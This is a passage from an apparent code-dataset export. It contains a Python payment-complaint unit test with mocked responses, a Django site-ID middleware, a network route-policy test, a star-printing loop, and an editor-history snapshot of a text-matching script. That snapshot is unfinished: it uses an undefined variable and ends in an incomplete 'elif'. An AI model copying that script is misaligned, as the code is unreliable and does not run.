cookies=Mock(get_dict=Mock(return_value=cookies)),
headers={}
)
with self.assertRaises(Retry):
process_payment_complaint_patch(
complaint_params=complaint_params,
payment_data=payment_data,
patch_data=patch_data,
)
self.assertEqual(
push_payment_message.mock_calls,
[
call(payment_data, PAYMENTS_PATCH_COMPLAINT_CODE_ERROR, ANY),
]
)
process_payment_complaint_patch.retry.assert_called_once_with(
countdown=DEFAULT_RETRY_AFTER
)
def test_handle_404_response(self):
payment_data = {"description": "test"}
complaint_params = {"test": "test"}
cookies = {"TEST_COOKIE": "TEST_COOKIE_VALUE"}
patch_data = {"patch_test_field": "patch_test_value"}
process_payment_complaint_patch.retry = Mock(
side_effect=Retry
)
with patch("payments.utils.requests") as requests_mock, \
patch("payments.logging.push_payment_message") as push_payment_message:
requests_mock.patch.return_value = Mock(
status_code=404,
cookies=Mock(get_dict=Mock(return_value=cookies)),
headers={}
)
with self.assertRaises(Retry):
process_payment_complaint_patch(
complaint_params=complaint_params,
payment_data=payment_data,
patch_data=patch_data,
)
self.assertEqual(
push_payment_message.mock_calls,
[
call(payment_data, PAYMENTS_PATCH_COMPLAINT_CODE_ERROR, ANY),
]
)
process_payment_complaint_patch.retry.assert_called_once_with(
countdown=DEFAULT_RETRY_AFTER
)
@patch("liqpay_int.tasks.process_payment_complaint_recheck")
def test_handle_403_response(self, process_payment_complaint_recheck):
payment_data = {"description": "test"}
complaint_params = {"test": "test"}
cookies = {"TEST_COOKIE": "TEST_COOKIE_VALUE"}
patch_data = {"patch_test_field": "patch_test_value"}
with patch("payments.utils.requests") as requests_mock, \
patch("payments.logging.push_payment_message") as push_payment_message:
requests_mock.patch.return_value = Mock(
status_code=403,
cookies=Mock(get_dict=Mock(return_value=cookies)),
headers={}
)
process_payment_complaint_patch(
complaint_params=complaint_params,
payment_data=payment_data,
patch_data=patch_data,
)
self.assertEqual(
push_payment_message.mock_calls,
[
call(payment_data, PAYMENTS_PATCH_COMPLAINT_CODE_ERROR, ANY),
]
)
process_payment_complaint_recheck.apply_async.assert_called_once_with(
kwargs=dict(
payment_data=payment_data,
complaint_params=complaint_params,
patch_data=patch_data,
cookies=cookies
)
)
def test_handle_200_response_complaint_pending(self):
payment_data = {"description": "test"}
complaint_params = {"test": "test"}
cookies = {"TEST_COOKIE": "TEST_COOKIE_VALUE"}
patch_data = {
"status": "pending"
}
with patch("payments.utils.requests") as requests_mock, \
patch("payments.logging.push_payment_message") as push_payment_message:
requests_mock.patch.return_value = Mock(
status_code=200,
cookies=Mock(get_dict=Mock(return_value=cookies))
)
requests_mock.patch.return_value.json.return_value = {"data": {"author": "test"}}
process_payment_complaint_patch(
complaint_params=complaint_params,
payment_data=payment_data,
patch_data=patch_data,
)
self.assertEqual(
push_payment_message.mock_calls,
[
call(payment_data, PAYMENTS_PATCH_COMPLAINT_PENDING_SUCCESS, ANY),
]
)
def test_handle_200_response_complaint_mistaken(self):
payment_data = {"description": "test"}
complaint_params = {"test": "test"}
cookies = {"TEST_COOKIE": "TEST_COOKIE_VALUE"}
patch_data = {
"status": "mistaken"
}
with patch("payments.utils.requests") as requests_mock, \
patch("payments.logging.push_payment_message") as push_payment_message:
requests_mock.patch.return_value = Mock(
status_code=200,
cookies=Mock(get_dict=Mock(return_value=cookies))
)
requests_mock.patch.return_value.json.return_value = {"data": {"author": "test"}}
process_payment_complaint_patch(
complaint_params=complaint_params,
payment_data=payment_data,
patch_data=patch_data,
)
self.assertEqual(
push_payment_message.mock_calls,
[
call(payment_data, PAYMENTS_PATCH_COMPLAINT_NOT_PENDING_SUCCESS, ANY),
]
)
| [
"[email protected]"
] | |
8e4474d37dbadeacda29af5e1b54ffe20ecd50a6 | 9789aaa94e4a321fed2a1f624ef180d938f1fe56 | /src/common/appenginepatch/ragendja/sites/dynamicsite.py | 6726a46f3ba6519e5807b3b081d1ea305ce0e818 | [
"MIT",
"Apache-2.0"
] | permissive | fantascy/snsanalytics | 61ff6b8f384f0bd4be8f89a2a19101ad2cf1bc77 | 927f186c7f5a1d534e0ff7ce7aff46a0c1a36c51 | refs/heads/master | 2021-01-13T14:18:05.684839 | 2016-11-06T07:43:35 | 2016-11-06T07:43:35 | 72,827,547 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,871 | py | from django.conf import settings
from django.core.cache import cache
from django.contrib.sites.models import Site
from ragendja.dbutils import db_create
from ragendja.pyutils import make_tls_property
_default_site_id = getattr(settings, 'SITE_ID', None)
SITE_ID = settings.__class__.SITE_ID = make_tls_property()
class DynamicSiteIDMiddleware(object):
"""Sets settings.SIDE_ID based on request's domain"""
def process_request(self, request):
# Ignore port if it's 80 or 443
if ':' in request.get_host():
domain, port = request.get_host().split(':')
try:
if int(port) not in (80, 443):
domain = request.get_host()
except:
pass
else:
domain = request.get_host().split(':')[0]
# We cache the SITE_ID
cache_key = 'Site:domain:%s' % domain
site = cache.get(cache_key)
if site:
SITE_ID.value = site
else:
site = Site.all().filter('domain =', domain).get()
if not site:
# Fall back to with/without 'www.'
if domain.startswith('www.'):
fallback_domain = domain[4:]
else:
fallback_domain = 'www.' + domain
site = Site.all().filter('domain =', fallback_domain).get()
# Add site if it doesn't exist
if not site and getattr(settings, 'CREATE_SITES_AUTOMATICALLY',
True):
site = db_create(Site, domain=domain, name=domain)
site.put()
# Set SITE_ID for this thread/request
if site:
SITE_ID.value = str(site.key())
else:
SITE_ID.value = _default_site_id
cache.set(cache_key, SITE_ID.value, 5*60)
| [
"[email protected]"
] | |
48c0e44801b00a0cd341ed48de18a466761dc047 | 7af7f44a7ab947094cf923fc911474f7f8c8b25b | /pkgs/conf-pkg/src/genie/libs/conf/route_policy/iosxr/tests/test_route_policy.py | 7a90802740d3fc16e1ed2430e6a6137dc9fe8cf5 | [
"Apache-2.0"
] | permissive | miott/genielibs | fb6bdd244063b4dbe4b8ba61387cb5dce76d2fe8 | 6464642cdd67aa2367bdbb12561af4bb060e5e62 | refs/heads/master | 2020-09-11T07:14:13.067983 | 2019-12-03T02:38:40 | 2019-12-03T02:38:40 | 221,984,648 | 0 | 0 | Apache-2.0 | 2019-11-15T18:52:07 | 2019-11-15T18:52:07 | null | UTF-8 | Python | false | false | 9,021 | py | # import python
import operator
import unittest
import unittest.mock
from unittest.mock import Mock
# import genie
from genie.conf.tests import TestCase
from genie.conf import Genie
from genie.conf.base import Testbed, Device, Interface
from genie.libs.conf.route_policy import RoutePolicy
class test_route_policy(TestCase):
def test_init(self):
Genie.testbed = testbed = Testbed()
dev1 = Device(testbed=testbed, name='PE1', os='iosxr')
intf1 = Interface(device=dev1, name='GigabitEthernet0/0/0/1',
ipv4='10.1.0.1/24')
intf2 = Interface(device=dev1, name='GigabitEthernet0/0/0/2',
ipv4='10.2.0.1/24')
intf3 = Interface(device=dev1, name='GigabitEthernet0/0/0/3',
ipv4='10.3.0.1/24')
dev2 = Device(testbed=testbed, name='PE2', os='iosxr')
intf4 = Interface(device=dev2, name='GigabitEthernet0/0/0/3',
ipv4='10.1.0.2/24')
intf5 = Interface(device=dev2, name='GigabitEthernet0/0/0/4',
ipv4='10.2.0.2/24')
with self.assertNoWarnings():
rpl1 = RoutePolicy(name='rpl1')
dev1.add_feature(rpl1)
rpl1.pass_on = True
cfgs = rpl1.build_config(apply=False)
self.assertCountEqual(cfgs.keys(), [dev1.name])
self.assertMultiLineDictEqual(cfgs, {
dev1.name: '\n'.join([
'route-policy rpl1',
' pass',
' end-policy',
]),
})
rpl1 = RoutePolicy(name='rpl1')
dev1.add_feature(rpl1)
rpl1.conditions = []
cond = RoutePolicy.Condition(
RoutePolicy.Condition.op_contains,
(intf1.ipv4.ip, intf2.ipv4.network),
'destination')
cond.if_attr.set_nexthop = intf3.ipv4.ip
cond.else_attr.drop_on = True
rpl1.conditions.append(cond)
cfgs = rpl1.build_config(apply=False)
self.assertCountEqual(cfgs.keys(), [dev1.name])
self.assertMultiLineDictEqual(cfgs, {
dev1.name: '\n'.join([
'route-policy rpl1',
' if destination in (10.1.0.1, 10.2.0.0/24) then',
' set next-hop 10.3.0.1',
' else',
' drop',
' endif',
' end-policy',
]),
})
class A(object):
def __repr__(self):
return '<a>'
def __init__(self):
self.rpl_set = Mock(side_effect=setattr)
self.rpl_get = Mock(side_effect=getattr)
a = A()
a.destination = intf5.ipv4.ip
pass_on = rpl1.rpl_apply_attributes(a, setattr=a.rpl_set,
getattr=a.rpl_get)
self.assertEqual(a.rpl_get.call_args_list, [
unittest.mock.call(a, 'destination'),
])
self.assertEqual(a.rpl_set.call_args_list, [
unittest.mock.call(a, 'nexthop', intf3.ipv4.ip),
])
self.assertIs(pass_on, True)
a = A()
a.destination = intf4.ipv4.ip
pass_on = rpl1.rpl_apply_attributes(a, setattr=a.rpl_set,
getattr=a.rpl_get)
self.assertEqual(a.rpl_get.call_args_list, [
unittest.mock.call(a, 'destination'),
])
self.assertEqual(a.rpl_set.call_args_list, [
unittest.mock.call(a, 'drop', True),
])
self.assertIs(pass_on, False)
del cond.else_attr.drop_on
cfgs = rpl1.build_config(apply=False)
self.assertCountEqual(cfgs.keys(), [dev1.name])
self.assertMultiLineDictEqual(cfgs, {
dev1.name: '\n'.join([
'route-policy rpl1',
' if destination in (10.1.0.1, 10.2.0.0/24) then',
' set next-hop 10.3.0.1',
' endif',
' end-policy',
]),
})
a = A()
a.destination = intf4.ipv4.ip
pass_on = rpl1.rpl_apply_attributes(a, setattr=a.rpl_set,
getattr=a.rpl_get)
self.assertEqual(a.rpl_get.call_args_list, [
unittest.mock.call(a, 'destination'),
])
self.assertEqual(a.rpl_set.call_args_list, [
])
self.assertIs(pass_on, False)
def test_basic_uncfg_with_name(self):
'''
Testing in case of having 'name' as the route-policy name.
'''
Genie.testbed = testbed = Testbed()
dev1 = Device(testbed=testbed, name='PE1', os='iosxr')
rpl1 = RoutePolicy(name='rpl1')
dev1.add_feature(rpl1)
rpl1.device_attr[dev1].statement_attr['10']
rpl1.device_attr[dev1].statement_attr['10'].match_med_eq = 5
rpl1.device_attr[dev1].statement_attr['10'].match_nexthop_in = 'hop'
rpl1.device_attr[dev1].statement_attr['10'].actions = 'pass'
# Unconfig testing
# Set a mock
dev1.configure = Mock()
dev1.add_feature(rpl1)
# Mock config
uncfg1 = rpl1.build_unconfig(apply=False)
self.assertCountEqual(uncfg1.keys(), ['PE1'])
self.assertMultiLineEqual(str(uncfg1['PE1']), '\n'.join(
['no route-policy rpl1'
]))
def test_basic_cfg(self):
Genie.testbed = testbed = Testbed()
dev1 = Device(testbed=testbed, name='PE1', os='iosxr')
dev2 = Device(testbed=testbed, name='PE2', os='iosxr')
rpl1 = RoutePolicy(policy_definition='rpl1')
dev1.add_feature(rpl1)
rpl1.device_attr[dev1].statement_attr[10]
rpl1.device_attr[dev1].statement_attr[10].match_med_eq = 5
rpl1.device_attr[dev1].statement_attr[10].match_nexthop_in = 'hop'
rpl1.device_attr[dev1].statement_attr[10].actions = 'pass'
rpl1.device_attr[dev1].statement_attr[20]
rpl1.device_attr[dev1].statement_attr[20].match_med_eq = 10
rpl1.device_attr[dev1].statement_attr[20].match_nexthop_in = 'hop2'
rpl1.device_attr[dev1].statement_attr[20].match_local_pref_eq = 16
rpl1.device_attr[dev1].statement_attr[20].actions = 'drop'
rpl1.device_attr[dev1].statement_attr[30]
rpl1.device_attr[dev1].statement_attr[30].match_med_eq = 20
rpl1.device_attr[dev1].statement_attr[30].match_nexthop_in = 'hop3'
rpl1.device_attr[dev1].statement_attr[30].actions = 'done'
rpl1.device_attr[dev1].statement_attr[30].set_med = 32
cfgs = rpl1.build_config(apply=False)
self.assertCountEqual(cfgs.keys(), [dev1.name])
self.assertMultiLineEqual(str(cfgs[dev1.name]), '\n'.join(
['route-policy rpl1',
' if med eq 5 and next-hop in hop then',
' # 10',
' pass',
' elseif local-preference eq 16 and med eq 10 and next-hop in hop2 then',
' # 20',
' drop',
' elseif med eq 20 and next-hop in hop3 then',
' # 30',
' set med 32',
' done',
' endif',
' end-policy',
' exit'
]))
# Testing the configuration without if/else statements
# ----------------------------------------------------
rpl2 = RoutePolicy(policy_definition='rpl2')
dev2.add_feature(rpl2)
rpl2.device_attr[dev2].statement_attr['10']
rpl2.device_attr[dev2].statement_attr['10'].actions = 'pass'
rpl2.device_attr[dev2].statement_attr['10'].set_med = 32
cfgs2 = rpl2.build_config(apply=False)
self.assertCountEqual(cfgs2.keys(), [dev2.name])
self.assertMultiLineEqual(str(cfgs2[dev2.name]), '\n'.join(
['route-policy rpl2',
' # 10',
' set med 32',
' pass',
' end-policy',
' exit'
]))
def test_basic_uncfg(self):
Genie.testbed = testbed = Testbed()
dev1 = Device(testbed=testbed, name='PE1', os='iosxr')
rpl1 = RoutePolicy(policy_definition='rpl1')
dev1.add_feature(rpl1)
rpl1.device_attr[dev1].statement_attr['10']
rpl1.device_attr[dev1].statement_attr['10'].match_med_eq = 5
rpl1.device_attr[dev1].statement_attr['10'].match_nexthop_in = 'hop'
rpl1.device_attr[dev1].statement_attr['10'].actions = 'pass'
# Unconfig testing
# Set a mock
dev1.configure = Mock()
dev1.add_feature(rpl1)
# Mock config
uncfg1 = rpl1.build_unconfig(apply=False)
self.assertCountEqual(uncfg1.keys(), ['PE1'])
self.assertMultiLineEqual(str(uncfg1['PE1']), '\n'.join(
['no route-policy rpl1'
]))
if __name__ == '__main__':
unittest.main()
| [
"[email protected]"
] | |
e181215cb13fb8115ec569045a2a436e59e5014d | 53dd5d2cfb79edc87f6c606bbfb7d0bedcf6da61 | /.history/EMR/SBSteat_20190605143628.py | 436cd5b69bcdf8df0610fd888bd8a19bbd9dbf67 | [] | no_license | cyc19950621/python | 4add54894dc81187211aa8d45e5115903b69a182 | d184b83e73334a37d413306d3694e14a19580cb0 | refs/heads/master | 2020-04-11T20:39:34.641303 | 2019-07-02T12:54:49 | 2019-07-02T12:54:49 | 162,078,640 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 898 | py | def SBS(A,B):
if A==0 or B ==0:
return 0
elif set(A)<=set(B) or set(B)<=set(A):
return 1
else:
return len(set(A)&set(B)) /len(set(A)|set(B))
def StrToList(A):
C=[]
for i in A:
C.append(i)
return C
import re
f = open('D:\DeepLearning ER\Z1006014.txt','r',errors='ignore')
g = open(r'C:\Users\Administrator\Desktop\ICD-10.txt','r',errors='ignore')
line_re=[]
lines = f.readlines()
dics=g.readlines()
out = []
for dic in disc:
dic=re.sub('\n','',dic)
for line in lines:
line=re.sub('\n','',line)
line=re.sub(' ','',line)
line = re.sub(r'\?|?', '',line)
line = re.sub(r'\,|\.|;','',line)
line_re.append(line)
while '' in line_re:
line_re.remove('')
for line in line_re:
for dic in disc:
dic=re.sub('\n','',dic)
if set(line) >= set(dic):
out.append(dic)
elif SBS(line,)
| [
"[email protected]"
] | |
9ea449314a5ebdfc2798ec21f4d3570831fdb476 | 9a7904a3ee4abd4c352a746b13963073aa62314b | /01_jumptopy/Jump_to_Python/chap03/138-2.py | 8ebb6a4d81830ab05e6f85c0700c8997c49930e7 | [] | no_license | cat-holic/Python-Bigdata | 4ab1528fa9e804206a2381ac08293088c3e9e250 | 2cb6c75eb02b3b0dc3a16a63c0446c1fc6f04f71 | refs/heads/master | 2020-03-15T09:27:33.944887 | 2018-08-02T08:16:35 | 2018-08-02T08:16:35 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 60 | py | i=0
while True:
i+=1
if i>5:break
print('*'*i)
| [
"[email protected]"
] |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.